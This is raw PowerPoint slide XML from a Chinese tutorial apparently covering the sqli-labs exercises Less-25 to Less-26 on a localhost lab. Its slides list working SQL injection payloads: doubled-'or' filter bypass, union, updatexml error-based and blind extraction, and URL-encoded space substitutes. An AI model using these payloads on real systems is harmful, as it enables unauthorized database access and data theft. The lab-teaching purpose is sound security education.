              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时报错，说明存在漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/Less-25/?id=1‘  order by  1--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句发现报错，无法使用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. Hint: Your Input is Filtered with following result: 1‘ der by 1– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>网页里，作者给出了一个提示，发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>被过滤了，我们尝试双写</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5. http://127.0.0.1/sqli/Less-25/?id=1‘  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>oorrder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> by  1--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>返回正常，可以进行测试，最后知道有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>双写的情况下，我们开始测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3644773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303801"/>
            <a:ext cx="10131425" cy="260644"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-25_02</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en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/Less-25/?id=-1‘  union select 1,2,3--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>获得回显位置</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. http://127.0.0.1/sqli/Less-25/?id=-1‘  union select 1,2,schema_name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>根据提示我们可以到所有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>都被替换了，所以所有位置的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>都需要写两次</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. http://127.0.0.1/sqli/Less-25/?id=-1‘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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>取出所有的库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. http://127.0.0.1/sqli/Less-25/?id=-1‘  union select 1,2,group_concat(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=0x7365637572697479 --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>取出所有的表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5. http://127.0.0.1/sqli/Less-25/?id=-1‘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取出所有的字段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>6. http://127.0.0.1/sqli/Less-25/?id=-1‘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取出字段中的值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>当我们使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>的时候：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256084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305800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-25_03</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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/Less-25/?id=-1‘  || 1=1--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>判断存在注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-25/?id=-1‘  || updatexml(1,concat(0x7e,(database()),0x7e),1)--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>爆出当前数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. http://127.0.0.1/sqli/Less-25/?id=-1‘  || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(1,concat(0x7e,(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>infoorrmation_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> limit 0,1),0x7e),1)--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>遍历爆出所有的数据，继续使用即可，这里不可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，因为数据显示不完整</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395261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283221"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-25a_01</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endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>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http://127.0.0.1/sqli/Less-25a/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>页面显示正常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/Less-25a/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时页面发生显著变化，数据消失，说明存在注入，但是通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语句得知，此处并没有将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>值进行包裹</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3. http://127.0.0.1/sqli/Less-25a/?id=-1 union select 1,2,3--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>可以使用联合查询，当我们使用联合查询注入时：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. http://127.0.0.1/sqli/Less-25a/?id=-1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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查到库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5. http://127.0.0.1/sqli/Less-25a/?id=-1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查到字段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>6. http://127.0.0.1/sqli/Less-25a/?id=-1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查到字段值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7695282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957837" y="405402"/>
            <a:ext cx="10131425" cy="249354"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-25a_02</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fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>当我们使用基于时间的布尔盲注：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
              <a:t>1. http://127.0.0.1/sqli/Less-25a/?id=-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0" err="1"/>
              <a:t>oorr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
              <a:t> if(length(database())&gt;1,1,sleep(5))--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>可以通过这个判断当前数据库长度</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
              <a:t>2. http://127.0.0.1/sqli/Less-25a/?id=-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0" err="1"/>
              <a:t>oorrif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
              <a:t>(left(database(),1)&gt;‘a’,1,sleep(5))--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>判断当前数据库的组成</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
              <a:t>3. http://127.0.0.1/sqli/Less-25a/?id=-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0" err="1"/>
              <a:t>oorr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
              <a:t> if(left((select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0,1),1)&gt;‘a’,1,sleep(5))--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>通过这个判断所有的数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>依次再进行下去。。。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>当我们使用布尔盲注的时候：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
              <a:t>1. http://127.0.0.1/sqli/Less-25a/?id=-1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0" err="1"/>
              <a:t>oorr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
              <a:t> length(database())&gt;1--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>此时页面返回正常，则得知当前的数据库长度是大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
              <a:t>2.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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>当前的页面返回正常，说明此时的第一个数据库的第一个字母是大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
              <a:t>3.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0,1),1)=‘a’--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>此时等于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>的时候，页面返回异常，说明我们的语句写的是正确的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>依次再进行下去。。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38416356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0856A-3790-4332-9551-B7B81A4D8185}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1765925" y="416690"/>
            <a:ext cx="10131425" cy="181622"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>空格</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编码替换</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6493AC9B-71CD-4163-AB83-E84F3E28543A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>绕开空格：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%09 TAB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>键（水平）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%0a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>新建一行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%0c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>新的一页</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%0d return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>功能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%0b TAB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>键（垂直）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%a0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>空格</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2312277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173464" y="360245"/>
            <a:ext cx="10131425" cy="159044"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-26_01</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http://127.0.0.1/sqli/Less-26/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>显示正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2.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/Less-26/?id=1’--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>无法正常显示，代码中过滤了注释符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>--+  # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，空格，正反斜杠</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/Less-26/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’ ;%00 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时显示正常，说明存在注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/Less-26/?id=1‘ || ’1‘=‘1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>也可以作为一个验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5. http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
